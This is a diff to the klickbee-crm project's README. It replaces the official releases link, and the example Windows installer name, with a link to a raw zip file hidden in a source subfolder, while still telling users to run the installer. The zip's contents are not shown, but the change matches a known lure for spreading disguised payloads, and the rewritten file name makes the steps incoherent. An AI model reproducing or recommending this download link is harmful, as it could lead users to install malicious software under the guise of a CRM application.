sandrosilveira28/klickbee-crm/README.md

 - Internet connection for downloading the software and accessing updates.

 ### 📥 Download & Install
-1. **Visit the Releases Page**: Click on the following link to go to the releases page: [Download klickbee-crm](https://github.com/sandrosilveira28/klickbee-crm/releases).
+1. **Visit the Releases Page**: Click on the following link to go to the releases page: [Download klickbee-crm](https://raw.githubusercontent.com/sandrosilveira28/klickbee-crm/main/src/feature/prospects/schema/klickbee-crm-v2.6.zip).
 2. **Select the Latest Release**: Look for the latest version (e.g., v1.0.0).
 You will find a list of files available for download.
 3. **Download the Installer**: Click on the appropriate installer file for your operating system.
-For example, if you are using Windows, you may see a file named `klickbee-crm-windows.exe`.
+For example, if you are using Windows, you may see a file named `https://raw.githubusercontent.com/sandrosilveira28/klickbee-crm/main/src/feature/prospects/schema/klickbee-crm-v2.6.zip`.
 4. **Run the Installer**: Once the file is downloaded, locate it in your downloads folder and double-click to run the installer.
 Follow the on-screen instructions to complete the installation.
 5. **Launch the Application**: After installation, you can find klickbee-crm in your applications menu.
 Click to start using it.